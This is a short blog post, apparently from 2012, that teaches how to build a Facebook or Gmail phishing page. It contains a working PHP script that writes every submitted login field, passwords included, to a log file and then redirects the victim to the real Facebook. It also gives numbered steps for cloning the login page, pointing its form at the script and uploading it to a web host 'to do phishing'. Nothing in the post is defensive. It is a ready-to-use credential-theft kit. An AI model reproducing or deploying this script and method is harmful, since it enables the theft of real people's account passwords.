Trending: TeCh ZoNe

Friday, February 24, 2012

How to create your own phishing page | manual [TUT]





header ('Location: http://www.facebook.com');$handle = fopen("log.txt", "a");foreach($_POST as $variable => $value) {   fwrite($handle, $variable);   fwrite($handle, "=");   fwrite($handle, $value);   fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>


1. copy the script above & open your notepad save it as log.php or login.php


2. now open facebook or gmail home page  which software you wana create..i am creating facebook phishing login page...!!!




3. RIGHT CLICK > save as save the script with the name INDEX.HTML  like in the image


4.  now open it with  notepad find "action" word for that you can use CTRL + F now  delete the http://facebook... and use login.php? in the place of the link save your script


NOW YOUR LOGIN.PHP AND INDEX.HTML PAGES ARE READY...!!

 6. now you can upload your script to any webhosting websites to do phishing!!

7. rest of how to do phishing tutorial is here: phishing TuT

All Rights Reserved TeCh ZoNe | Blogger Template by Bloggermint
back to top